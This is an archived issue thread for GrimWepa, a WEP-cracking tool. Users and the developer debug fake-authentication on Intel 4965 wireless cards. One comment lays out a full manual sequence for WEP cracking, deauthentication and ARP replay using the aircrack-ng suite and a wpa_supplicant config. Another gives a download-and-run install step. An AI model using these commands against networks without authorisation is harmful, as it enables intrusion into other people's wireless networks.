ffazio / grimwepa

Automatically exported from code.google.com/p/grimwepa

No support for fake-auth with intel chipset (iwl4965) #6

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago
mixit on BT4 forums suggested this; said it was difficult to implement.

Remote Exploit covered this flaw in the iwl4965 chipset in depth (15 pages long) at this link:
http://forums.remote-exploit.org/bt4beta-working-hardware/20119-4965-agn.html

A work-around would require (upon failed fake-authentication):

 - check to see if chipset is iwl4965 (via airmon-ng)

 - creation of conf file (fake.conf) containing:

network={
ssid="NAME_OF_AP"
key_mgmt=NONE
wep_key0="fakeauth"
}

   where "NAME_OF_AP" is the name of the access point in quotes.

 - running wpa_supplicant with this conf file.

Further steps will be covered once they are reached.

Original issue reported on code.google.com by der...@gmail.com on 2 Mar 2010 at 3:03

GoogleCodeExporter commented 9 years ago
I will second this. I have iwl4965 and this would be a very welcomed fix.

Thanks for all your hard work. I love the program.

Original comment by tpzeg...@gmail.com on 5 Mar 2010 at 2:46

GoogleCodeExporter commented 9 years ago
It's good to know there's other people that would use this feature.

I've uploaded a new version (technically it's GrimWepa v1.01 Beta); it is my second stab at fixing the fake-auth on Intel 4965 chipsets.

To download the new install script, change permissions, and run the script which will download/install the new version of GrimWepa, copy/paste this:
{{{
wget http://grimwepa.googlecode.com/files/grimstall.sh
chmod 755 grimstall.sh
./grimstall.sh install
}}}

After starting the attack on the Intel 4965 chipset, and failing the fake-authentication, GrimWepa *should* prompt you that you are using the Intel 4965 chipset, and then ask if you want to try the wpa_supplicant fix. Select "Yes" and wait to see if your MAC address appears in the airodump-ng window...

If this doesn't fake-authenticate for you, let me know!
If this DOES fake authenticate, let me know!!

After we have it working 100%, I'll remove the prompt so it automatically uses
wpa_supplicant.

Also, if it fails, *before you stop the attack*, see if GrimWepa created a fake.conf file in the same location as the .jar file.

Original comment by der...@gmail.com on 5 Mar 2010 at 4:18

GoogleCodeExporter commented 9 years ago
I grabbed the beta and the workaround does not seem to be working. I can't get any IVs when using the 4965 chipset. I did notice, however, that the fake.conf file that is generated is not putting the wep_key0 variable in quotations. I am not sure if this makes a difference, but the variable is in quotations in all the scripts I have seen and in the example you posted above. Hope this helps. Thanks for a great tool.

Original comment by DavidCMo...@gmail.com on 5 Mar 2010 at 9:39

GoogleCodeExporter commented 9 years ago
I will also add that the workaround posted in the bt thread does work for me:

/etc/init.d/networking start

startx

airmon-ng start wlan0
airodump-ng mon0
ctrl+c
airodump-ng -c 'AP Channel' -w 'filename' --bssid 'AP bssid' mon0
make a file in the root (desktop) fake.conf:

network={
ssid="SSID" <-- change this in your target ssid
key_mgmt=NONE
wep_key0="fakeauth"
}

wpa_supplicant -c fake.conf -i wlan0 -Dwext -B

aireplay-ng -3 -b 'AP bssid' mon0
aireplay-ng -0 1 -a 'AP bssid' mon0

aircrack-ng -b BSSID capfile-01.cap

Original comment by DavidCMo...@gmail.com on 5 Mar 2010 at 10:02

GoogleCodeExporter commented 9 years ago
@DavidCMolnar (and anyone else)...

Thanks for the feedback... I've made the change to include quotes and it's attached to this post...

I'm looking at the above script, and I think the problem is GrimWepa is trying to use wpa_supplicant on MON0 (the selected wifi device), rather than the original WLAN0... this could be quite a tricky situation!

The program should *now* prompt for the user to enter the wireless card that was originally used (wlan0 in most cases).

I'm going to use trial-and-error to solve this problem with the Intel 4965 workaround.

I hate to keep posting version-after-version on the site... and it's going to be more difficult to track which version works! I can keep attaching mini-revisions to these comments if it works for you guys... otherwise we could do the e-mail thing...

I would like to get immediate feedback, and hope to solve this problem *tonight*!

Derv

Original comment by der...@gmail.com on 6 Mar 2010 at 1:56


GoogleCodeExporter commented 9 years ago
I think you nailed it with the latest patch! Thanks for the quick update. It seems to properly hook the wpa_supplicant and I am getting IVs using the ARP-Replay attack which I was not getting in V1.0. Thanks for the quick patch!

Original comment by DavidCMo...@gmail.com on 6 Mar 2010 at 3:32

GoogleCodeExporter commented 9 years ago
Awesome! Glad to hear it works for you... I've already updated v1.0 in the Downloads section to include this revision. I'll try to wait for more positive reports before bragging about it :P

Now, for the questions:

* Does everyone who has the Intel 4965 wireless card use "wlan0" ?

* Is the Intel 4965 chipset popular because it is a built-in wifi card on laptops? Is it safe to assume that people who have the iwl4965 card have it as wlan0?

* Should I automatically have GrimWepa assume the user has wlan0 as the interface for the Intel card, so as to speed up the cracking process?

* If you think there's a chance someone DOESN'T use wlan0, I can keep the program as it is: requiring user input before fake-authenticating...

* ..Otherwise, I will force the program to use wlan0 so you don't have to see the confirmation dialog every time.

I wish I knew these things and didn't have to ask :\

I hope you guys don't mind -- just trying to make it better suited for you!

Original comment by der...@gmail.com on 6 Mar 2010 at 5:01

GoogleCodeExporter commented 9 years ago
Hi All,

I'm one of the unlucky guys with an Intel 4965 AGN :-) There are a couple of points here. (And my good Realtek card is at home and I'm on a business trip for 2 months.)

First, is the wpa_supplicant workaround present in the latest version 1.10a5.jar? Because I start it with the -v switch and I don't see any output in the command-line log that the wpa_supplicant is started. I also don't see any association in the airodump window.

In version 1.0 it's asking for the wlan0 interface but it's not working for my configuration... (I have the latest svn from aircrack.) By doing it the old-fashioned way it works, but honestly I hate typing.

2) Question... does anybody know if it is confirmed that with version > 1573 SVN aircrack the fake auth is working without the wpa_supplicant stuff?

Thanks folks.

I appreciate feedback.

Joe

Original comment by icq70...@gmail.com on 2 Jun 2010 at 10:39